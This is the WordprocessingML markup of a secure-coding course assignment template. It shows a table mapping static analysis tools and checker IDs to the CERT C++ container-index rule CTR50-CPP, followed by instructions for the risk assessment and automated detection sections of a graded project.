          <w:p w14:paraId="078AE2E1" w14:textId="3DA7370C" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DF2891</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="762E8270" w14:textId="52F7A432" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D601A" w14:paraId="3A61865D" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F90722D" w14:textId="4B52508B" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId147" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6379161E" w14:textId="0F5C2090" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37525AC9" w14:textId="7FCD85AC" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ABV.ANY_SIZE_ARRAY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ABV.GENERAL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ABV.GENERAL.MULTIDIMENSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ABV.STACK </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ABV.TAINTED</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SV.TAINTED.ALLOC_SIZE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SV.TAINTED.CALL.INDEX_ACCESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SV.TAINTED.CALL.LOOP_BOUND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SV.TAINTED.INDEX_ACCESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D719B59" w14:textId="0A8E178A" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D601A" w14:paraId="6B2B24EF" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BBAB8E" w14:textId="46A82227" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId148" w:history="1">
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE816DA" w14:textId="77777777" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:divId w:val="846216385"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B1460B" w14:textId="3BC17480" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45D8FD92" w14:textId="7DDCD526" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>45 D, 47 S, 476 S, 489 S, 64 X, 66 X, 68 X, 69 X, 70 X, 71 X, 79 X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3084A142" w14:textId="7CC5B29B" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D601A" w14:paraId="3EDB9E1C" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7134DB5C" w14:textId="12B05A18" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId149" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D0400D" w14:textId="61D722D3" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3735EE4B" w14:textId="193D5063" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_CPP-CTR50-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B03763C" w14:textId="50746C8A" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Guarantee that container indices are within the valid range</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D601A" w14:paraId="7282C048" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A4D6880" w14:textId="25A2C135" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId150" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56AE9F2F" w14:textId="36F08CFA" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="041DC01E" w14:textId="20877817" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId151" w:history="1">
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C++: CTR50-CPP</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1E5ECE" w14:textId="77777777" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601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642803FD" w14:textId="77777777" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">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out of bounds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E2DE430" w14:textId="77777777" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">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Array access with tainted index</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7197F920" w14:textId="77777777" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>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 xml:space="preserve">Pointer </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dereference</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>tainted offset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="046003E9" w14:textId="6E3D2BD8" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Rule partially covered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D601A" w14:paraId="7E43A7F6" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1784AB" w14:textId="115EC29D" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId152" w:history="1">
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>PVS-Studio</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A494700" w14:textId="30B93DEA" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58358B4A" w14:textId="1E6F41A5" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId153" w:history="1">
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V781</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="192D69E1" w14:textId="4A449969" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">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30" w:name="_Toc52464069"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Defense-in-Depth Illustration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1D0134D3" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:bookmarkStart w:id="31" w:name="_Int_pzcTHqwi"/>
      <w:r>
        <w:t>This illustration provides a visual representation of the defense-in-depth best practice of layered security.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>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32" w:name="_Toc52464070"/>
      <w:r>
        <w:t>Project One</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4A732D14" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Int_FjCb3vx2"/>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>There are seven steps outlined below that align with the elements you will be graded on in the accompanying rubric.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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34" w:name="_Toc52464071"/>
      <w:r>
        <w:t>Revise the C/C++ Standards</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="5C660E59" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Int_v98MsnS2"/>
      <w:r w:rsidRPr="54BB6B49">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w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserv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36" w:name="_Toc52464072"/>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE09CB6" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete this section on the coding standards tables. Enter high, medium, or low for each of the headers, then rate it overall using a scale from 1 to 5, 5 being the greatest threat. </w:t>
      </w:r>
      <w:bookmarkStart w:id="37" w:name="_Int_51LUYS85"/>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You will address each of the seven policy standards. Fill in the columns of severity, likelihood, remediation cost, priority, and level using the values provided in the appendix.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>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38" w:name="_Toc52464073"/>
      <w:r>
        <w:t>Automated Detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="3B814C98" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Int_cuKDldUc"/>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Complete this section of each table on the coding standards to show the tools that may be used to detect issues.</w:t>
